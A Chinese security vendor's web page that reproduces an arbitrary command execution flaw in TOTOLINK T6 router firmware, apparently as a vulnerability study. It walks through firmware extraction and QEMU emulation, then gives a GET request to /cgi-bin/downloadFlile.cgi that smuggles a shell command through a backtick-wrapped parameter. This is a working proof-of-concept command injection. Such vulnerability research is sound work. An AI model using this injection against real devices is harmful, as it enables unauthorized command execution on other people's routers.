美創AI災備專家:引領災備領域邁入“智能化”時代
2025-12-15
熱點觀察|美創科技丁斐:數據安全 × 價值共創?可信數據空間的 “雙向奔赴”
2025-12-03
美創科技高校供應鏈數據安全方案斬獲 2025 年度 “金智獎”
2025-12-03
每周安全速遞3?? | ShinyHunters 開發新型勒索軟件ShinySp1d3r
2025-11-21
數安標桿|美創榮登2025中國準獨角獸企業100強?
2025-11-17
存儲域
數據庫加密 諾亞防勒索訪問域
數據庫防水壩 數據庫防火墻 數據庫安全審計 動態脫敏流動域
靜態脫敏 數據水印 API審計 API防控 醫療防統方運維服務
數據庫運維服務 中間件運維服務 國產信創改造服務 駐場運維服務 供數服務安全咨詢服務
數據出境安全治理服務 數據安全能力評估認證服務 數據安全風險評估服務 數據安全治理咨詢服務 數據分類分級咨詢服務 個人信息風險評估服務 數據安全檢查服務TOTOLINK是一款無線路由品牌,TOTOLINK T6_Firmware V5.9c.4085_B20190428存在一個任意命令執行漏洞。
TOTOLINK T6_Firmware V5.9c.4085_B20190428
訪問
https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/190/ids/36.h
下載T6_Firmware V5.9c.4085_B20190428固件
固件下載成功后,執行
binwalk -Me TOTOLINK_C818NR_T6_IP04338_8197FN_SPI_16M128M_V5.9c.4085_B20190428_ALL.web --run-as=root
提取文件系統
進入提取的文件系統目錄
執行
mkdir var/run && touch /var/run/lighttpd.pid
創建路由器啟動環境所需的pid
執行

給路由器web服務創建一個虛擬網絡環境
執行
wget https://people.debian.org/\~aurel32/qemu/mipsel/debian_wheezy_mipsel_standard.qcow2 && wget https://people.debian.org/\~aurel32/qemu/mipsel/vmlinux-3.2.0-4-4kc-malta
下載鏡像和虛擬磁盤環境,為搭建路由器web作前置準備
鏡像和虛擬磁盤下載完畢后,執行
qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1" -netdev tap,id=tapnet,ifname=tap2,script=no -device rtl8139,netdev=tapnet -nographic
啟動虛擬環境,虛擬環境啟動后賬號密碼為root/root

登錄虛擬環境后,執行
ifconfig eth0 192.168.6.10
配置虛擬環境網絡
返回原始機器環境,執行
scp -r squashfs-root/ root@192.168.6.10:/root/
將文件系統拷貝至虛擬環境中

在虛擬環境中執行

啟動路由器web服務
在原始機器環境中通過瀏覽器訪問
http://192.168.6.15/login.asp
出現如圖所示頁面代表環境搭建成功
該漏洞觸發點位于
/cgi-bin/downloadFlile.cgi
構造如下數據包并請求
執行pwd命令并將命令結果寫入../pwd.txt
GET /cgi-bin/downloadFlile.cgi?payload=`pwd>../pwd.txt` HTTP/1.1
Host: 192.168.6.10
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
瀏覽器訪問

如圖所示,頁面顯示pwd命令結果
